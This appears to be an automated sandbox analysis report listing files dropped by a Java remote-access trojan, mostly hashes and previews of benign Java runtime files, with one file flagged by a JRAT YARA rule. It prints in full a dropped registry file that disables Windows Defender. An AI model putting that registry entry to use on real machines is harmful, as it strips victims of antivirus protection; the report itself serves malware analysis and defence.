• Antivirus: Metadefender, Detection: 49%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...LW..LW..LW...W..LW...W..LW...W..LW..W..LW..MW..LW...W..LW...W..LW...W..LWRich..LW........................PE..L......V...........!.....N...H...............`.......................................e....@.........................P.......|...P...................................0a..................................@............`...............................text...hM.......N.................. ..`.rdata...)...`...*...R..............@..@.data...<............|..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):247088
                                                                                                                                                                                              Entropy (8bit):7.977146417027946
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:WI5pxUZ7Gvi8ulm+yV/rIF0/MO2qnan1J7pXESN6U:J5pxAGqNkrIq/MO2qnA
                                                                                                                                                                                              MD5:781FB531354D6F291F1CCAB48DA6D39F
                                                                                                                                                                                              SHA1:9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
                                                                                                                                                                                              SHA-256:97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
                                                                                                                                                                                              SHA-512:3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                              • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, Author: Florian Roth
                                                                                                                                                                                              Preview: PK........A.QJ................META-INF/MANIFEST.MF....M.1..0...@...u.XA(.jq.bED..y.@LJ."..F;(.r..w..yPL.J!..$..5g..#.]O.Y..O|.u...x...8Q[..^.Zh.Pk.c.OL.Ck'h.Fc5g.8a.%@..0...I....V.E..&`g.j....wK.~w..@3G.:.1q...PK..\..........PK........A.QJ................iQA/Fjx/ywe.u..@....Y.u.....,.`D.#.......:q......P.Up....n...F.z8'...."....P.Fu.....{.Lw.M.r5...c.}..U.L*...^j{a'..0JF^r.Y......a.~.f\..z....p... .^.%.v.E.k..6aP..WZ...-#L.c).'B..#n.K.....A....npG....p).x..z..u... .e'.'.j...&<....H..]wJ.[.....|...].....[Xy...o.Dh.I....B........z.."7Lh.1."EU..7n.9......J50..12....#.!...%........[9U..7.e`[...7.*..\...\..t*.l....j"*..H..B.K....".!....!..p...\|<{U......8.6..7.4....e..5)%....}.0.N...O....A..x$..]......Cz..?.KUD=..)=....=c..b.4oD......U...U..i.'k.....@.....r:.t.\.n..n...+..'..,WE.B.M.n.. ..A.W.u.T...{`.=..[e3.C.p...._.LC..V..?....._...v;.|p.zw......._@....9...*5...J...2.!.#S..Oj....<]+.5)*+.u...d......\..u......w..n..>..-&B...!._b6.Mv.VS.W.e......."
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):143
                                                                                                                                                                                              Entropy (8bit):5.215498656146558
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:jBJ0nMWXZ6RKZFNKugLxqyB+zfyM1KJA7Bm22SEXAHsJ7V/7v:jBJ0nMhRKLNK9Lx78zH18A7BB1EXisJR
                                                                                                                                                                                              MD5:0E5411D7ECBA9A435AFDA71C6C39D8FD
                                                                                                                                                                                              SHA1:2D6812052BF7BE1B5E213E1D813AE39FAA07284C
                                                                                                                                                                                              SHA-256:CB68D50DF5817E51EC5B2F72893DC4C749BF3504519107E0A78DDA84D55F09E2
                                                                                                                                                                                              SHA-512:903AC6E5C8A12607AF267B54BCBBEDFA5542C5B4F7EA289AB7C6A32A424D5B846AE406D830CB4AD48E2B46F92C504163C0856AF8C3E09685A8855F39F616DDB1
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview: Windows Registry Editor Version 5.00..[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]."DisableAntiSpyware"=dword:00000001....
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):695808
                                                                                                                                                                                              Entropy (8bit):6.430026624943613
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:F1Ty5f/GBgQbkkH13Lxewo3CoGOJwdzRI3XHCYLKxX7XjSt0yaAfIou4KxR92l:F1TyQBgQbkkHRNeweCIyd1I3XiYL6X7V
                                                                                                                                                                                              MD5:A4E510D903F05892D77741C5F4D95B5D
                                                                                                                                                                                              SHA1:754781BA8E1C574B830AE2A239CCCCDA2C4B5E70
                                                                                                                                                                                              SHA-256:A3FBDF4FBDF56AC6A2EBEB4C131C5682F2E2EADABC758CFE645989C311648506
                                                                                                                                                                                              SHA-512:9A3AE623B1469357EC8E7EFDE4F14AA838DE2011495F8D3504D6B97293AA0957762D231BE43E57926F8EF8E38067268FB98B99D8FD612219B07181E47AE60F10
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
• Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..U...........#.....^.......... ........p.....j.......................................... .................................|................................5..................................................l................................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..4............v..............@.`@.bss.........p........................`..edata...............H..............@.0@.idata..|............T..............@.0..CRT....,............d..............@.0..tls.... ............f..............@.0..reloc...5.......6...h..............@.0B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):45
                                                                                                                                                                                              Entropy (8bit):0.9111711733157262
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                              MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                              SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                              SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                              SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: ........................................J2SE.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\COPYRIGHT
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:ISO-8859 text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3244
                                                                                                                                                                                              Entropy (8bit):4.504892344419146
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:3kjJXQSqgbiihCrRbo+Q/cV0rDcFBL3P0/r3:3cAaOi01E+xV0rDaBL3P0z3
                                                                                                                                                                                              MD5:A762796B2A8989B8952B653A178607A1
                                                                                                                                                                                              SHA1:C725183C757011E7BA96C83C1E86EE7E8B516A2B
                                                                                                                                                                                              SHA-256:79CCB53E0DBDB8EC16747A516EB77C3737C797E544AAA0A552B8A886A70EEF69
                                                                                                                                                                                              SHA-512:9D88BD2910A0D7820732D498B11B4676A5A122F24093640D8F07D417E4D7077A3D411F5F3E96CC124483DBED9C940B9526CA8B19FBC7CE69CB294476FCAA6C91
                                                                                                                                                                                              Malicious:false
Preview: Copyright . 1993, 2018, Oracle and/or its affiliates..All rights reserved...This software and related documentation are provided under a.license agreement containing restrictions on use and.disclosure and are protected by intellectual property laws..Except as expressly permitted in your license agreement or.allowed by law, you may not use, copy, reproduce, translate,.broadcast, modify, license, transmit, distribute, exhibit,.perform, publish, or display any part, in any form, or by.any means. Reverse usering, disassembly, or.decompilation of this software, unless required by law for.interoperability, is prohibited...The information contained herein is subject to change.without notice and is not warranted to be error-free. If you.find any errors, please report them to us in writing...If this is software or related documentation that is.delivered to the U.S. Government or anyone licensing it on.behalf of the U.S. Government, the following notice is.applicable:..U.S. GOVERNMENT END US
C:\Users\user\AppData\Roaming\Oracle\LICENSE
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:ASCII text
Category:dropped
Size (bytes):44
Entropy (8bit):4.322179345516666
Encrypted:false
SSDEEP:3:c3AXFshzYoQ4XTn:c9hzYUXT
MD5:432427FE963E254F41915D5FFA20928D
SHA1:500CF349A204DCD6497F9789884BC8C3F2657212
SHA-256:3DD5B54C70C5942B771786C2D1511A9A60CCC1D30CDCA0A5FE9A2CEE107119FA
SHA-512:04FC154B57729FCCAED106E1A709ED6F116554D1261E9C4132EBBB89E943E65AA50BBE1F6C187CE75787692359725243F45B5A8ED3EE7CFB1C5186A881A5BA6B
Malicious:false
Preview: Please refer to https://java.com/bc_license.
C:\Users\user\AppData\Roaming\Oracle\README.txt
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:ASCII text
Category:dropped
Size (bytes):46
Entropy (8bit):4.197049999347145
Encrypted:false
SSDEEP:3:c3AXFshzhRSkU:c9hzhgkU
MD5:0F1123976B959AC5E8B89EB8C245C4BD
SHA1:F90331DF1E5BADEADC501D8DD70714C62A920204
SHA-256:963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
SHA-512:E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
Malicious:false
Preview: Please refer to http://java.com/licensereadme.
C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:UTF-8 Unicode (with BOM) text
Category:dropped
Size (bytes):112748
Entropy (8bit):4.843314745575208
Encrypted:false
SSDEEP:3072:ig3JrYrpltztZvepyF6qN7amC3lqN7amC3pqN7amC3K:L3XqN2plqN2ppqN2pK
MD5:FE4BB0E003D7600BAE6D18237C3D08D0
SHA1:B46C7DA4401D3513942885B4EAA8DAA2C71B3761
SHA-256:31985DE04028045F7D0CE01717CE9FC0A25AE86229BB111870518C23E80B8758
SHA-512:26B0E6780EE644426CADAE2185DCFC85A66E6E05D228183FE7B6F28FCE05A53B081D6C571889C0EBFE91B33B0D1EADB557F4CD716B156ABFDF1EF7639F662008
Malicious:false
Preview: .DO NOT TRANSLATE OR LOCALIZE..***************************************************************************..%%The following software may be included in this product:.Apple Computer: CoreAudio Utility Classes v2.0..Notice: This software is present only on Mac OS X systems...Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple.Inc. ("Apple") in consideration of your agreement to the following.terms, and your use, installation, modification or redistribution of.this Apple software constitutes acceptance of these terms. If you do.not agree with these terms, please do not use, install, modify or.redistribute this Apple software...In consideration of your agreement to abide by the following terms, and.subject to these terms, Apple grants you a personal, non-exclusive.license, under Apple's copyrights in this original Apple software (the."Apple Software"), to use, reproduce, modify and redistribute the Apple.Software, with or without modifications, in source and/or binary
C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:UTF-8 Unicode text
Category:dropped
Size (bytes):149725
Entropy (8bit):5.017225619410427
Encrypted:false
SSDEEP:3072:Yj33DuJ8sY5sPfqN7amC35qs4NZ1G8OAN6Cflxocw+4oHHZZvcm9lHNOXG8A5oJt:HqN2p5i+cw+4oxH6N3Rj
MD5:6965EEEF8A55556BB1DDED43BCA822DD
SHA1:EFD8B1FD278FF3171686D4E170D0CEDC4DC1982C
SHA-256:7B3639E1EA1571B44F4DB53246950B6AB6CAAC9E4B067D95928E91293BB0A0FD
SHA-512:7E475A02D29F48A52C259D8CB3DD3D23B9F7002DF217D570F3125CAA815229DBE07ED4366EE93BCA1FC32E81E29B958DE2871DB9B776A4E8F44533CB5AC69C93
Malicious:false
Preview: DO NOT TRANSLATE OR LOCALIZE..-----------------------------..%% This notice is provided with respect to ASM Bytecode Manipulation .Framework v5.0.3, which may be included with JRE 8, and JDK 8, and .OpenJDK 8...--- begin of LICENSE ---..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWAR
C:\Users\user\AppData\Roaming\Oracle\Welcome.html
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:HTML document, ASCII text
Category:dropped
Size (bytes):955
Entropy (8bit):5.096095653697231
Encrypted:false
SSDEEP:24:INMTdqcxtK4jXQ5VaJ2gjQo4pDW94m/DJn:TTdqIK4jXjJdso4V7E
MD5:810EF9BE9BDF09983D41E244A6179A20
SHA1:D98AE54F03DAC87419ABC19B97E315830C2DA55F
SHA-256:DB34008B34B4BC3177436E71BD01557D45D52E710699758AB227E5FEC7FFADB8
SHA-512:3DA4DE8D7A7D037AA64F9A771C9AEB743D43839294ACB773CECB2BA9B0C869CF3D7F3E3BC41D803238F297647E85ABD43F596F1C2DF46579EC0A34263744E406
Malicious:false
Preview: <html>.<head>.<title>.Welcome to the Java(TM) Platform.</title>.</head>.<body>..<h2>Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Platform</h2>.<p> Welcome to the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> Standard Edition Runtime . Environment. This provides complete runtime support for Java applications. .<p> The runtime environment includes the Java<SUP><FONT SIZE=-2>TM</FONT></SUP> . Plug-in product which supports the Java environment inside web browsers. .<h3>References</h3>.<p>.See the <a href="http://download.oracle.com/javase/7/docs/technotes/guides/plugin/">Java Plug-in</a> product.documentation for more information on using the Java Plug-in product..<p> See the <a href=."http://www.oracle.com/technetwork/java/javase/overview/".>Java Platform</a> web site for . more information on the Java Platform. .<hr>.<font size="-2">.Copyright (c) 2006, 2018, Oracle and/or its affiliates. All rights reserved..</font>.<p>.</body>.</html>.
C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):15736
Entropy (8bit):6.1841491234044375
Encrypted:false
SSDEEP:192:3cdMW5YN83XLPVT6ysMPGpcuaiMbL1tJx+wOp/uIfH0JOqsmVgz28WhBq/OkQfq:GM+97PVaaGpcuGj+Xt/8JN77hhu+C
MD5:C81B757A9C7E535FF7C995AAC9B26ADC
SHA1:1E933C3EC781AD6E3BC53A6C16FFB222817FB61E
SHA-256:3A3F04859A69E7156593EB34323E4818920BA2DE7DA5C6556C9AB518028F9259
SHA-512:100B8421B217E148EBAC9B856A6324FFC2A811FDDDFD2650E853930C47B88BFA8E20AC039D1EE4B144DE261BB0B91EBF88535C6F455D5D1B4159C571ED42D390
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):128888
Entropy (8bit):6.409705724342423
Encrypted:false
SSDEEP:3072:ovAznTOzUca38u4HTK/e2Hrgc6kZAn1yEkBKMKy1Zf22QYHJiuzTl8ShzzM+64my:ovcwUca354ZnQ5zj
MD5:AD7C3D549B9DC43146400C294EDEECD0
SHA1:5FB491506339FDA6B973F26A24D8865EBC55B591
SHA-256:C4D19FE205A73193F1E5F3300C4D24FD2A5F58AF83E742C541C28E4CDD21E450
SHA-512:7FC1756C1E2B2A3FEE879B55562AD82AE820FB9D8E78E99784D74C256D3D327D144FBE21162FAA7B5F655C086D23D77F36EBD0FD5C22F9F96DC196D9E0819FE5
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):99192
Entropy (8bit):6.432934247604729
Encrypted:false
SSDEEP:1536:uQLZsxXloJQrrUQ+1IFiYls/q+X8Pik8PgVCsG080PssHfghEx:oVloJQrIQ+zYlsiFPdVCsr0sHLx
MD5:267EEF05571CD7A94BA730D0194A60AA
SHA1:361B9FEEC9429273377FF29C84B6158D686993A6
SHA-256:DCFA3C454D330D14B9481AA3EABBFA6A5203644891714D97D3B6D92ABBFC670D
SHA-512:3C8C69BF3618BF2D66F8754B2F126554EDD790B8029836B6235598B824BC24ACBBABB61BAE44ED45A573937EBBDE6316B1BD14E2917A397389E03C0C32D1C87E
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 3%
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.080160932980843
Encrypted:false
SSDEEP:192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
MD5:502263C56F931DF8440D7FD2FA7B7C00
SHA1:523A3D7C3F4491E67FC710575D8E23314DB2C1A2
SHA-256:94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
SHA-512:633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.093995452106596
Encrypted:false
SSDEEP:192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
MD5:CB978304B79EF53962408C611DFB20F5
SHA1:ECA42F7754FB0017E86D50D507674981F80BC0B9
SHA-256:90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
SHA-512:369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.1028816880814265
Encrypted:false
SSDEEP:384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
MD5:88FF191FD8648099592ED28EE6C442A5
SHA1:6A4F818B53606A5602C609EC343974C2103BC9CC
SHA-256:C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
SHA-512:942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.126358371711227
Encrypted:false
SSDEEP:192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
MD5:6D778E83F74A4C7FE4C077DC279F6867
SHA1:F5D9CF848F79A57F690DA9841C209B4837C2E6C3
SHA-256:A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
SHA-512:02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):21816
Entropy (8bit):7.014255619395433
Encrypted:false
SSDEEP:384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
MD5:94AE25C7A5497CA0BE6882A00644CA64
SHA1:F7AC28BBC47E46485025A51EEB6C304B70CEE215
SHA-256:7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
SHA-512:83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.112057846012794
Encrypted:false
SSDEEP:192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:E2F648AE40D234A3892E1455B4DBBE05
SHA1:D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.166618249693435
Encrypted:false
SSDEEP:192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:E479444BDD4AE4577FD32314A68F5D28
SHA1:77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.1117101479630005
Encrypted:false
SSDEEP:384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:6DB54065B33861967B491DD1C8FD8595
SHA1:ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18232
Entropy (8bit):7.174986589968396
Encrypted:false
SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:2EA3901D7B50BF6071EC8732371B821C
SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17856
Entropy (8bit):7.076803035880586
Encrypted:false
SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:D97A1CB141C6806F0101A5ED2673A63D
SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.131154779640255
Encrypted:false
SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
